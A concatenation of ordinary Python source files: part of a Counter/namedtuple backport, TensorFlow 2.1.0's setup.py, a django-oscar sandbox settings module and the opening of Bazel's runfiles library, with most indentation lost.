return _chain.from_iterable(_starmap(_repeat, self.iteritems()))
# Override dict methods where necessary
@classmethod
def fromkeys(cls, iterable, v=None):
# There is no equivalent method for counters because setting v=1
# means that no element can have a count greater than one.
raise NotImplementedError(
'Counter.fromkeys() is undefined. Use Counter(iterable) instead.')
def update(self, iterable=None, **kwds):
'''Like dict.update() but add counts instead of replacing them.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.update('witch') # add elements from another iterable
>>> d = Counter('watch')
>>> c.update(d) # add elements from another counter
>>> c['h'] # four 'h' in which, witch, and watch
4
'''
# The regular dict.update() operation makes no sense here because the
        # replace behavior results in some of the original untouched counts
        # being mixed-in with all of the other counts for a mishmash that
        # doesn't have a straightforward interpretation in most counting
# contexts. Instead, we implement straight-addition. Both the inputs
# and outputs are allowed to contain zero and negative counts.
if iterable is not None:
if isinstance(iterable, Mapping):
if self:
self_get = self.get
for elem, count in iterable.iteritems():
self[elem] = self_get(elem, 0) + count
else:
super(Counter, self).update(iterable) # fast path when counter is empty
else:
self_get = self.get
for elem in iterable:
self[elem] = self_get(elem, 0) + 1
if kwds:
self.update(kwds)
def subtract(self, iterable=None, **kwds):
'''Like dict.update() but subtracts counts instead of replacing them.
Counts can be reduced below zero. Both the inputs and outputs are
allowed to contain zero and negative counts.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.subtract('witch') # subtract elements from another iterable
>>> c.subtract(Counter('watch')) # subtract elements from another counter
>>> c['h'] # 2 in which, minus 1 in witch, minus 1 in watch
0
>>> c['w'] # 1 in which, minus 1 in witch, minus 1 in watch
-1
'''
if iterable is not None:
self_get = self.get
if isinstance(iterable, Mapping):
for elem, count in iterable.items():
self[elem] = self_get(elem, 0) - count
else:
for elem in iterable:
self[elem] = self_get(elem, 0) - 1
if kwds:
self.subtract(kwds)
def copy(self):
'Return a shallow copy.'
return self.__class__(self)
def __reduce__(self):
return self.__class__, (dict(self),)
def __delitem__(self, elem):
'Like dict.__delitem__() but does not raise KeyError for missing values.'
if elem in self:
super(Counter, self).__delitem__(elem)
def __repr__(self):
if not self:
return '%s()' % self.__class__.__name__
items = ', '.join(map('%r: %r'.__mod__, self.most_common()))
return '%s({%s})' % (self.__class__.__name__, items)
# Multiset-style mathematical operations discussed in:
# Knuth TAOCP Volume II section 4.6.3 exercise 19
# and at http://en.wikipedia.org/wiki/Multiset
#
# Outputs guaranteed to only include positive counts.
#
# To strip negative and zero counts, add-in an empty counter:
# c += Counter()
def __add__(self, other):
'''Add counts from two counters.
>>> Counter('abbb') + Counter('bcc')
Counter({'b': 4, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count + other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __sub__(self, other):
''' Subtract count, but keep only results with positive counts.
>>> Counter('abbbc') - Counter('bccd')
Counter({'b': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count - other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count < 0:
result[elem] = 0 - count
return result
def __or__(self, other):
'''Union is the maximum of value in either of the input counters.
>>> Counter('abbb') | Counter('bcc')
Counter({'b': 3, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = other_count if count < other_count else count
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __and__(self, other):
''' Intersection is the minimum of corresponding counts.
>>> Counter('abbb') & Counter('bcc')
Counter({'b': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = count if count < other_count else other_count
if newcount > 0:
result[elem] = newcount
return result
if __name__ == '__main__':
# verify that instances can be pickled
from cPickle import loads, dumps
Point = namedtuple('Point', 'x, y', True)
p = Point(x=10, y=20)
assert p == loads(dumps(p))
# test and demonstrate ability to override methods
class Point(namedtuple('Point', 'x y')):
__slots__ = ()
@property
def hypot(self):
return (self.x ** 2 + self.y ** 2) ** 0.5
def __str__(self):
return 'Point: x=%6.3f y=%6.3f hypot=%6.3f' % (self.x, self.y, self.hypot)
for p in Point(3, 4), Point(14, 5 / 7.):
print p
class Point(namedtuple('Point', 'x y')):
'Point class with optimized _make() and _replace() without error-checking'
__slots__ = ()
_make = classmethod(tuple.__new__)
def _replace(self, _map=map, **kwds):
return self._make(_map(kwds.get, ('x', 'y'), self))
print Point(11, 22)._replace(x=100)
Point3D = namedtuple('Point3D', Point._fields + ('z',))
print Point3D.__doc__
import doctest
TestResults = namedtuple('TestResults', 'failed attempted')
print TestResults(*doctest.testmod())
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow is an open source machine learning framework for everyone.
TensorFlow is an open source software library for high performance numerical
computation. Its flexible architecture allows easy deployment of computation
across a variety of platforms (CPUs, GPUs, TPUs), and from desktops to clusters
of servers to mobile and edge devices.
Originally developed by researchers and engineers from the Google Brain team
within Google's AI organization, it comes with strong support for machine
learning and deep learning and the flexible numerical computation core is used
across many other scientific domains.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fnmatch
import os
import re
import sys
from setuptools import Command
from setuptools import find_packages
from setuptools import setup
from setuptools.command.install import install as InstallCommandBase
from setuptools.dist import Distribution
DOCLINES = __doc__.split('\n')
# This version string is semver compatible, but incompatible with pip.
# For pip, we will remove all '-' characters from this string, and use the
# result for pip.
# Also update tensorflow/tensorflow.bzl and
# tensorflow/core/public/version.h
_VERSION = '2.1.0'
REQUIRED_PACKAGES = [
'absl-py >= 0.7.0',
'astunparse == 1.6.3',
'backports.weakref >= 1.0rc1;python_version<"3.4"',
'enum34 >= 1.1.6;python_version<"3.4"',
'gast == 0.3.3',
'google_pasta >= 0.1.8',
'h5py >= 2.10.0, < 2.11.0',
'keras_preprocessing >= 1.1.0',
'numpy >= 1.16.0, < 2.0',
'opt_einsum >= 2.3.2',
'protobuf >= 3.8.0',
'tensorboard >= 2.1.0, < 2.2.0',
'tensorflow_estimator >= 2.1.0, < 2.2.0',
'termcolor >= 1.1.0',
'wrapt >= 1.11.1',
# python3 requires wheel 0.26
'wheel >= 0.26;python_version>="3"',
'wheel;python_version<"3"',
# mock comes with unittest.mock for python3, need to install for python2
'mock >= 2.0.0;python_version<"3"',
# functools comes with python3, need to install the backport for python2
'functools32 >= 3.2.3;python_version<"3"',
'six >= 1.12.0',
# scipy < 1.4.1 causes segfaults due to pybind11
# Latest scipy pip for py2 is scipy==1.2.2
'scipy == 1.4.1;python_version>="3"',
'scipy == 1.2.2;python_version<"3"',
]
if sys.byteorder == 'little':
# grpcio does not build correctly on big-endian machines due to lack of
# BoringSSL support.
# See https://github.com/tensorflow/tensorflow/issues/17882.
REQUIRED_PACKAGES.append('grpcio >= 1.8.6')
project_name = 'tensorflow'
if '--project_name' in sys.argv:
project_name_idx = sys.argv.index('--project_name')
project_name = sys.argv[project_name_idx + 1]
sys.argv.remove('--project_name')
sys.argv.pop(project_name_idx)
# tf-nightly should depend on tb-nightly
if 'tf_nightly' in project_name:
for i, pkg in enumerate(REQUIRED_PACKAGES):
if 'tensorboard' in pkg:
REQUIRED_PACKAGES[i] = 'tb-nightly >= 2.2.0a0, < 2.3.0a0'
elif 'tensorflow_estimator' in pkg and '2.0' in project_name:
REQUIRED_PACKAGES[i] = 'tensorflow-estimator-2.0-preview'
elif 'tensorflow_estimator' in pkg:
REQUIRED_PACKAGES[i] = 'tf-estimator-nightly'
# pylint: disable=line-too-long
CONSOLE_SCRIPTS = [
'toco_from_protos = tensorflow.lite.toco.python.toco_from_protos:main',
'tflite_convert = tensorflow.lite.python.tflite_convert:main',
'toco = tensorflow.lite.python.tflite_convert:main',
'saved_model_cli = tensorflow.python.tools.saved_model_cli:main',
# We need to keep the TensorBoard command, even though the console script
# is now declared by the tensorboard pip package. If we remove the
# TensorBoard command, pip will inappropriately remove it during install,
# even though the command is not removed, just moved to a different wheel.
'tensorboard = tensorboard.main:run_main',
'tf_upgrade_v2 = tensorflow.tools.compatibility.tf_upgrade_v2_main:main',
'estimator_ckpt_converter = tensorflow_estimator.python.estimator.tools.checkpoint_converter:main',
]
# pylint: enable=line-too-long
# Only keep freeze_graph console script in 1.X.
if _VERSION.startswith('1.') and '_2.0' not in project_name:
CONSOLE_SCRIPTS.append(
'freeze_graph = tensorflow.python.tools.freeze_graph:run_main')
# remove the tensorboard console script if building tf_nightly
if 'tf_nightly' in project_name:
CONSOLE_SCRIPTS.remove('tensorboard = tensorboard.main:run_main')
TEST_PACKAGES = [
'scipy >= 0.15.1',
]
class BinaryDistribution(Distribution):
def has_ext_modules(self):
return True
class InstallCommand(InstallCommandBase):
"""Override the dir where the headers go."""
def finalize_options(self):
ret = InstallCommandBase.finalize_options(self)
self.install_headers = os.path.join(self.install_purelib, 'tensorflow_core',
'include')
self.install_lib = self.install_platlib
return ret
class InstallHeaders(Command):
"""Override how headers are copied.
The install_headers that comes with setuptools copies all files to
the same directory. But we need the files to be in a specific directory
hierarchy for -I <include_dir> to work correctly.
"""
description = 'install C/C++ header files'
user_options = [('install-dir=', 'd',
'directory to install header files to'),
('force', 'f',
'force installation (overwrite existing files)'),
]
boolean_options = ['force']
def initialize_options(self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options(self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def mkdir_and_copy_file(self, header):
install_dir = os.path.join(self.install_dir, os.path.dirname(header))
# Get rid of some extra intervening directories so we can have fewer
# directories for -I
install_dir = re.sub('/google/protobuf_archive/src', '', install_dir)
install_dir = re.sub('/include/tensorflow_core/', '/include/tensorflow/',
install_dir)
# Copy external code headers into tensorflow_core/include.
# A symlink would do, but the wheel file that gets created ignores
# symlink within the directory hierarchy.
# NOTE(keveman): Figure out how to customize bdist_wheel package so
# we can do the symlink.
external_header_locations = [
'tensorflow_core/include/external/eigen_archive/',
'tensorflow_core/include/external/com_google_absl/',
]
for location in external_header_locations:
if location in install_dir:
extra_dir = install_dir.replace(location, '')
if not os.path.exists(extra_dir):
self.mkpath(extra_dir)
self.copy_file(header, extra_dir)
if not os.path.exists(install_dir):
self.mkpath(install_dir)
return self.copy_file(header, install_dir)
def run(self):
hdrs = self.distribution.headers
if not hdrs:
return
self.mkpath(self.install_dir)
for header in hdrs:
(out, _) = self.mkdir_and_copy_file(header)
self.outfiles.append(out)
def get_inputs(self):
return self.distribution.headers or []
def get_outputs(self):
return self.outfiles
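# Illustration of the path rewriting done by mkdir_and_copy_file() above
# (a sketch with hypothetical inputs; it is not executed during a build):
def _demo_header_install_dir():
  d = '/tmp/include/tensorflow_core/core/framework'
  d = re.sub('/google/protobuf_archive/src', '', d)
  d = re.sub('/include/tensorflow_core/', '/include/tensorflow/', d)
  assert d == '/tmp/include/tensorflow/core/framework'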
def find_files(pattern, root):
"""Return all the files matching pattern below root dir."""
for dirpath, _, files in os.walk(root):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(dirpath, filename)
so_lib_paths = [
i for i in os.listdir('.')
if os.path.isdir(i) and fnmatch.fnmatch(i, '_solib_*')
]
matches = []
for path in so_lib_paths:
matches.extend(
['../' + x for x in find_files('*', path) if '.py' not in x]
)
if os.name == 'nt':
EXTENSION_NAME = 'python/_pywrap_tensorflow_internal.pyd'
else:
EXTENSION_NAME = 'python/_pywrap_tensorflow_internal.so'
headers = (
list(find_files('*.h', 'tensorflow_core/compiler')) +
list(find_files('*.h', 'tensorflow_core/core')) +
list(find_files('*.h', 'tensorflow_core/stream_executor')) +
list(find_files('*.h', 'google/com_google_protobuf/src')) +
list(find_files('*.inc', 'google/com_google_protobuf/src')) +
list(find_files('*', 'third_party/eigen3')) + list(
find_files('*.h', 'tensorflow_core/include/external/com_google_absl')) +
list(
find_files('*.inc', 'tensorflow_core/include/external/com_google_absl'))
+ list(find_files('*', 'tensorflow_core/include/external/eigen_archive')))
setup(
name=project_name,
version=_VERSION.replace('-', ''),
description=DOCLINES[0],
long_description='\n'.join(DOCLINES[2:]),
url='https://www.tensorflow.org/',
download_url='https://github.com/tensorflow/tensorflow/tags',
author='Google Inc.',
author_email='packages@tensorflow.org',
# Contained modules and scripts.
packages=find_packages(),
entry_points={
'console_scripts': CONSOLE_SCRIPTS,
},
headers=headers,
install_requires=REQUIRED_PACKAGES,
tests_require=REQUIRED_PACKAGES + TEST_PACKAGES,
# Add in any packaged data.
include_package_data=True,
package_data={
'tensorflow': [
EXTENSION_NAME,
] + matches,
},
zip_safe=False,
distclass=BinaryDistribution,
cmdclass={
'install_headers': InstallHeaders,
'install': InstallCommand,
},
# PyPI package information.
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
license='Apache 2.0',
keywords='tensorflow tensor machine learning',
)
|
|
import os
# Path helper
location = lambda x: os.path.join(
os.path.dirname(os.path.realpath(__file__)), x)
USE_TZ = True
DEBUG = True
TEMPLATE_DEBUG = True
SQL_DEBUG = True
ALLOWED_HOSTS = ['latest.oscarcommerce.com',
'master.oscarcommerce.com']
# This is needed for the hosted version of the sandbox
ADMINS = (
('David Winterbottom', 'david.winterbottom@gmail.com'),
)
EMAIL_SUBJECT_PREFIX = '[Oscar sandbox] '
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
MANAGERS = ADMINS
# Use a Sqlite database by default
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': location('db.sqlite'),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
'ATOMIC_REQUESTS': True
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
# Prevent Django 1.7+ from showing a warning regarding a changed default test
# runner. The Oscar test suite is run with nose, so it does not matter.
SILENCED_SYSTEM_CHECKS = ['1_6.W001', ]
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
# Includes all languages that have >50% coverage in Transifex
# Taken from Django's default setting for LANGUAGES
gettext_noop = lambda s: s
LANGUAGES = (
('ar', gettext_noop('Arabic')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('da', gettext_noop('Danish')),
('de', gettext_noop('German')),
('en-gb', gettext_noop('British English')),
('el', gettext_noop('Greek')),
('es', gettext_noop('Spanish')),
('fi', gettext_noop('Finnish')),
('fr', gettext_noop('French')),
('it', gettext_noop('Italian')),
('ko', gettext_noop('Korean')),
('nl', gettext_noop('Dutch')),
('pl', gettext_noop('Polish')),
('pt', gettext_noop('Portuguese')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('ro', gettext_noop('Romanian')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('uk', gettext_noop('Ukrainian')),
('zh-cn', gettext_noop('Simplified Chinese')),
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = location("public/media")
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
#ADMIN_MEDIA_PREFIX = '/media/admin/'
STATIC_URL = '/static/'
STATIC_ROOT = location('public/static')
STATICFILES_DIRS = (
location('static/'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '$)a7n&o80u!6y5t-+jrd3)3!%vh&shg$wqpjpxc!ar&p#!)n1a'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# needed by django-treebeard for admin (and potentially other libs)
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.contrib.messages.context_processors.messages",
# Oscar specific
'oscar.apps.search.context_processors.search_form',
'oscar.apps.promotions.context_processors.promotions',
'oscar.apps.checkout.context_processors.checkout',
'oscar.core.context_processors.metadata',
'oscar.apps.customer.notifications.context_processors.notifications',
)
MIDDLEWARE_CLASSES = (
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.transaction.TransactionMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
# Allow languages to be selected
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
# Ensure a valid basket is added to the request instance for every request
'oscar.apps.basket.middleware.BasketMiddleware',
# Enable the ProfileMiddleware, then add ?cprofile to any
# URL path to print out profile details
#'oscar.profiling.middleware.ProfileMiddleware',
)
ROOT_URLCONF = 'urls'
# Add another path to Oscar's templates. This allows templates to be
# customised easily.
from oscar import OSCAR_MAIN_TEMPLATE_DIR
TEMPLATE_DIRS = (
location('templates'),
OSCAR_MAIN_TEMPLATE_DIR,
)
# A sample logging configuration. HTTP 500 errors are emailed to the site
# admins (when DEBUG is False), and the Oscar-specific loggers below also
# write to the console and to per-area log files under LOG_ROOT.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(message)s',
},
'simple': {
'format': '[%(asctime)s] %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'checkout_file': {
'level': 'INFO',
'class': 'oscar.core.logging.handlers.EnvFileHandler',
'filename': 'checkout.log',
'formatter': 'verbose'
},
'gateway_file': {
'level': 'INFO',
'class': 'oscar.core.logging.handlers.EnvFileHandler',
'filename': 'gateway.log',
'formatter': 'simple'
},
'error_file': {
'level': 'INFO',
'class': 'oscar.core.logging.handlers.EnvFileHandler',
'filename': 'errors.log',
'formatter': 'verbose'
},
'sorl_file': {
'level': 'INFO',
'class': 'oscar.core.logging.handlers.EnvFileHandler',
'filename': 'sorl.log',
'formatter': 'verbose'
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'filters': ['require_debug_false'],
},
},
'loggers': {
# Django loggers
'django': {
'handlers': ['null'],
'propagate': True,
'level': 'INFO',
},
'django.request': {
'handlers': ['mail_admins', 'error_file'],
'level': 'ERROR',
'propagate': False,
},
'django.db.backends': {
'handlers': ['null'],
'propagate': False,
'level': 'DEBUG',
},
# Oscar core loggers
'oscar.checkout': {
'handlers': ['console', 'checkout_file'],
'propagate': False,
'level': 'INFO',
},
'oscar.catalogue.import': {
'handlers': ['console'],
'propagate': False,
'level': 'INFO',
},
'oscar.alerts': {
'handlers': ['null'],
'propagate': False,
'level': 'INFO',
},
# Sandbox logging
'gateway': {
'handlers': ['gateway_file'],
'propagate': True,
'level': 'INFO',
},
# Third party
'south': {
'handlers': ['null'],
'propagate': True,
'level': 'INFO',
},
'sorl.thumbnail': {
'handlers': ['sorl_file'],
'propagate': True,
'level': 'INFO',
},
# Suppress output of this debug toolbar panel
'template_timings_panel': {
'handlers': ['null'],
'level': 'DEBUG',
'propagate': False,
}
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.flatpages',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django_extensions',
# Debug toolbar + extensions
'debug_toolbar',
'template_timings_panel',
'compressor', # Oscar's templates use compressor
'apps.gateway', # For allowing dashboard access
]
from oscar import get_core_apps
INSTALLED_APPS = INSTALLED_APPS + get_core_apps()
# As we use the sandbox to create both South migrations and native ones,
# the sandbox needs to work with both Django < 1.7 and Django >= 1.7
import django
if django.VERSION < (1, 7):
INSTALLED_APPS.append('south')
# Add Oscar's custom auth backend so users can sign in using their email
# address.
AUTHENTICATION_BACKENDS = (
'oscar.apps.customer.auth_backends.EmailBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_REDIRECT_URL = '/'
APPEND_SLASH = True
# Haystack settings
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': location('whoosh_index'),
},
}
# Here's a sample Haystack config if using Solr (which is recommended)
#HAYSTACK_CONNECTIONS = {
# 'default': {
# 'ENGINE': 'haystack.backends.solr_backend.SolrEngine',
# 'URL': u'http://127.0.0.1:8983/solr/oscar_latest/',
# 'INCLUDE_SPELLING': True
# },
#}
# =============
# Debug Toolbar
# =============
# Implicit setup can often lead to problems with circular imports, so we
# explicitly wire up the toolbar
DEBUG_TOOLBAR_PATCH_SETTINGS = False
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'template_timings_panel.panels.TemplateTimings.TemplateTimings',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
INTERNAL_IPS = ['127.0.0.1', '::1']
# ==============
# Oscar settings
# ==============
from oscar.defaults import *
# Meta
# ====
OSCAR_SHOP_TAGLINE = 'Sandbox'
OSCAR_RECENTLY_VIEWED_PRODUCTS = 20
OSCAR_ALLOW_ANON_CHECKOUT = True
# This is added to each template context by the core context processor. It is
# useful for test/stage/qa sites where you want to show the version of the site
# in the page title.
DISPLAY_VERSION = False
# Order processing
# ================
# Sample order/line status settings. This is quite simplistic. It's likely
# you'll want to override the set_status method on the order object to do
# more sophisticated things (a sketch follows the status dicts below).
OSCAR_INITIAL_ORDER_STATUS = 'Pending'
OSCAR_INITIAL_LINE_STATUS = 'Pending'
# This dict defines the new order statuses that an order can move to
OSCAR_ORDER_STATUS_PIPELINE = {
'Pending': ('Being processed', 'Cancelled',),
'Being processed': ('Complete', 'Cancelled',),
'Cancelled': (),
'Complete': (),
}
# This dict defines the line statuses that will be set when an order's status
# is changed
OSCAR_ORDER_STATUS_CASCADE = {
'Being processed': 'Being processed',
'Cancelled': 'Cancelled',
'Complete': 'Shipped',
}
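# A minimal sketch of such a set_status override (editor's illustration only;
# the release_stock_for helper is hypothetical, and a real override belongs
# in a forked order app rather than in this settings module):
#
#   from oscar.apps.order.abstract_models import AbstractOrder
#
#   class Order(AbstractOrder):
#       def set_status(self, new_status):
#           super(Order, self).set_status(new_status)
#           if new_status == 'Cancelled':
#               release_stock_for(self)  # hypothetical helper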
# LESS/CSS/statics
# ================
# We default to using CSS files, rather than the LESS files that generate them.
# If you want to develop Oscar's CSS, then set USE_LESS=True and
# COMPRESS_ENABLED=False in your settings_local module and ensure you have
# 'lessc' installed.
USE_LESS = False
COMPRESS_ENABLED = True
COMPRESS_PRECOMPILERS = (
('text/less', 'lessc {infile} {outfile}'),
)
COMPRESS_OFFLINE_CONTEXT = {
'STATIC_URL': 'STATIC_URL',
'use_less': USE_LESS,
}
# We do this to work around an issue in compressor where the LESS files are
# compiled but compression isn't enabled. When this happens, the relative URL
# is wrong between the generated CSS file and other assets:
# https://github.com/jezdez/django_compressor/issues/226
COMPRESS_OUTPUT_DIR = 'oscar'
# Logging
# =======
LOG_ROOT = location('logs')
# Ensure log root exists
if not os.path.exists(LOG_ROOT):
os.mkdir(LOG_ROOT)
# Sorl
# ====
THUMBNAIL_DEBUG = True
THUMBNAIL_KEY_PREFIX = 'oscar-sandbox'
# Django 1.6 switched to JSON session serialization for security reasons, but
# the JSON serializer cannot handle model instances. We should resolve this by
# extending django/core/serializers/json.Serializer with a `dumps` function;
# a sketch follows below. This setting is also defined in tests/config.py.
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
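# A minimal sketch of that extension (editor's illustration only, not wired
# up here; it mirrors the dumps/loads contract of the stock JSONSerializer):
#
#   import json
#   from django.core.serializers.json import DjangoJSONEncoder
#
#   class ExtendedJSONSerializer(object):
#       def dumps(self, obj):
#           return json.dumps(obj, cls=DjangoJSONEncoder).encode('latin-1')
#       def loads(self, data):
#           return json.loads(data.decode('latin-1'))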
# Try and import local settings which can be used to override any of the above.
try:
from settings_local import *
except ImportError:
pass
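# For reference, settings_local.py needs no boilerplate; it can simply assign
# any of the names above, e.g. (illustrative values):
#
#   DEBUG = False
#   ALLOWED_HOSTS = ['sandbox.example.com']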
|
|
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# Vendored in from bazelbuild/bazel (tools/python/runfiles/runfiles.py) at #
# commit 6c60a8ec049b6b8540c473969dd7bd1dad46acb9 (2019-07-19). See #
# //python/runfiles:BUILD for details. #
###############################################################################
"""Runfiles lookup library for Bazel-built Python binaries and tests.
USAGE:
1. Depend on this runfiles library from your build rule:
py_binary(
name = "my_binary",
...
deps = ["@bazel_tools//tools/python/runfiles"],
)
2. Import the runfiles library.
from bazel_tools.tools.python.runfiles import runfiles
3. Create a Runfiles object and use rlocation to look up runfile paths:
r = runfiles.Create()
...
with open(r.Rlocation("my_workspace/path/to/my/data.txt"), "r") as f:
contents = f.readlines()
...
The code above creates a manifest- or directory-based implementation based
on the environment variables in os.environ. See `Create()` for more info.
If you want to explicitly create a manifest- or directory-based
implementation, you can do so as follows:
r1 = runfiles.CreateManifestBased("path/to/foo.runfiles_manifest")
r2 = runfiles.CreateDirectoryBased("path/to/foo.runfiles/")
If you want to start subprocesses that also need runfiles, you need to set
the right environment variables for them:
import subprocess
from bazel_tools.tools.python.runfiles import runfiles
r = runfiles.Create()
env = {}
...
env.update(r.EnvVars())
p = subprocess.Popen([r.Rlocation("path/to/binary")], env=env, ...)
"""
import os
import posixpath
def CreateManifestBased(manifest_path):
return _Runfiles(_ManifestBased(manifest_path))
def CreateDirectoryBased(runfiles_dir_path):
return _Runfiles(_DirectoryBased(runfiles_dir_path))
def Create(env=None):
"""Returns a new `Runfiles` instance.
The returned object is either:
- manifest-based, meaning it looks up runfile paths from a manifest file, or
- directory-based, meaning it looks up runfile paths under a given directory
path
If `env` contains "RUNFILES_MANIFEST_FILE" with a non-empty value, this method
returns a manifest-based implementation. The object eagerly reads and caches
the whole manifest file upon instantiation; this may be relevant for
performance considerations.
Otherwise, if `env` contains "RUNFILES_DIR" with a non-empty value (checked in
this priority order), this method returns a directory-based implementation.
If neither case applies, this method returns None.
Args:
env: {string: string}; optional; the map of environment variables. If None,
this function uses the environment variable map of this process.
Raises:
IOError: if some IO error occurs.
"""
env_map = os.environ if env is None else env
manifest = env_map.get("RUNFILES_MANIFEST_FILE")
if manifest:
return CreateManifestBased(manifest)
directory = env_map.get("RUNFILES_DIR")
if directory:
return CreateDirectoryBased(directory)
return None
class _Runfiles(object):
